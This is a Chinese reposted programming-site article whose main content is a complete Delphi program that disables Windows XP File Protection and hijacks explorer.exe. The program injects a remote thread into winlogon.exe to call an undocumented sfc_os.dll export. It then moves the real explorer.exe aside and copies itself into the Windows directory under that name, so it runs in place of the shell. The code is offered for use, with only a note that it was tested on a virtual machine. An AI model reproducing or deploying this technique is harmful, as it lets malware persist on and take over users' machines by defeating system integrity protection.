<b>关闭XP保护.替换explorer.exe</b>[VC/C++编程]
本文“<b>关闭XP保护.替换explorer.exe</b>[VC/C++编程]”是由七道奇为您精心收集,来源于网络转载,文章版权归文章作者所有,本站不对其观点以及内容做任何评价,请读者自行判断,以下是其具体内容:
导读:
在偶的VPC上测试是可以的.没有更多的测试.
偶并没有调用dllcache目录下的.你喜好吧
{*******************************************************}
{ }
{ 关闭XP保护.替换explorer.exe }
{ }
{ 版权全部 (C) 2008 bbs.secdst.net }
{ }
{*******************************************************}
program Project1;
uses
Windows,TlHelp32;
function LowerCase(const S: string): string; //转小写
var
Ch: Char;
L: Integer;
Source, Dest: PChar;
begin
L := Length(S);
SetLength(Result, L);
Source := Pointer(S);
Dest := Pointer(Result);
while L <>0 do
begin
Ch := Source^;
if (Ch >= 'A') and (Ch <= 'Z') then Inc(Ch, 32);
Dest^ := Ch;
Inc(Source);
Inc(Dest);
Dec(L);
end;
end;
function CreatedMutexEx(MutexName: Pchar): Boolean;
var
MutexHandle: dword;
begin
MutexHandle := CreateMutex(nil, True, MutexName);
if MutexHandle <>0 then
begin
if GetLastError = ERROR_ALREADY_EXISTS then
begin
//CloseHandle(MutexHandle);
Result := False;
Exit;
end;
end;
Result := True;
end;
function GetWinPath: string; //取WINDOWS目录
var
Buf: array[0..MAX_PATH] of char;
begin
GetWindowsDirectory(Buf, MAX_PATH);
Result := Buf;
if Result[Length(Result)]<>'\' then Result := Result + '\';
end;
function GetTempDirectory: string; //取暂时目录
var
Buf: array[0..MAX_PATH] of char;
begin
GetTempPath(MAX_PATH,Buf);
Result := Buf;
if Result[Length(Result)]<>'\' then Result := Result + '\';
end;
function EnableDebugPriv : Boolean; //提权为DEBUG
var
hToken : THANDLE;
tp : TTokenPrivileges;
rl : Cardinal;
begin
result := false;
OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES or TOKEN_QUERY, hToken);
if LookupPrivilegeValue(nil, 'SeDebugPrivilege', tp.Privileges[0].Luid) then
begin
tp.PrivilegeCount := 1;
tp.Privileges[0].Attributes := SE_PRIVILEGE_ENABLED;
result := AdjustTokenPrivileges(hToken, False, tp, sizeof(tp), nil, rl);
end;
end;
procedure InjectThread(ProcessHandle: DWORD); //注入winlogon.exe 关闭XP文件保护
var
TID: LongWord;
hSfc,hThread: HMODULE;
pfnCloseEvents: Pointer;
begin
hSfc := LoadLibrary('sfc_os.dll');
pfnCloseEvents := GetProcAddress(hSfc,MAKEINTRESOURCE(2));
FreeLibrary(hSfc);
hThread := CreateRemoteThread(ProcessHandle, nil, 0, pfnCloseEvents, nil, 0, TID);
WaitForSingleObject(hThread, 4000);
end;
procedure InitProcess(Name: string); //查找winlogon.exe进程PID
var
FSnapshotHandle: THandle;
FProcessEntry32: TProcessEntry32;
ProcessHandle:dword;
begin
FSnapshotHandle := CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0);
FProcessEntry32.dwSize:=Sizeof(FProcessEntry32);
if Process32First(FSnapshotHandle,FProcessEntry32) then begin
repeat
If Name = LowerCase(FProcessEntry32.szExeFile) then
begin
ProcessHandle := OpenProcess(PROCESS_ALL_ACCESS, False, FProcessEntry32.th32ProcessID);
InjectThread(ProcessHandle);
CloseHandle(ProcessHandle);
Break;
end;
until not Process32Next(FSnapshotHandle,FProcessEntry32);
end;
CloseHandle(FSnapshotHandle);
end;
const ExpFile = 'explorer.exe';
MasterMutex = 'OpenSoul';
var
s: string;
begin
if not CreatedMutexEx(MasterMutex) then ExitProcess(0); //互拆体
if not EnableDebugPriv then Exit; //提权失溃退出
InitProcess('winlogon.exe') ;//注入winlogon.exe 先关闭xp的文件保护 .预防系统的复原
s := ParamStr(0) ;//取本名
if LowerCase(s) <>LowerCase(GetWinPath + ExpFile) then //判断自己是不是系统下的explorer.exe
begin //假如不是
MoveFileEx(PChar(GetWinPath + ExpFile),PChar(GetWinPath + 'system32\explorer.exe'),MOVEFILE_REPLACE_EXISTING); //先移动正在运行的explorer.exe
CopyFile(PChar(S),PChar(GetWinPath+ ExpFile),false) ;//把自己复制到windows目录 为explorer.exe
end;
WinExec(PChar(GetWinPath + 'system32\explorer.exe'),1); //运行真正的explorer.exe
end.
以上是“<b>关闭XP保护.替换explorer.exe</b>[VC/C++编程]”的内容,如果你对以上该文章内容感兴趣,你可以看看七道奇为您推荐以下文章:
| 本文地址: | 与您的QQ/BBS好友分享! |
- 好的评价 如果您觉得此文章好,就请您
0%(0) 
- 差的评价 如果您觉得此文章差,就请您
0%(0) 
中查找“<b>关闭XP保护.替换explorer.exe</b>”更多相关内容
中查找“<b>关闭XP保护.替换explorer.exe</b>”更多相关内容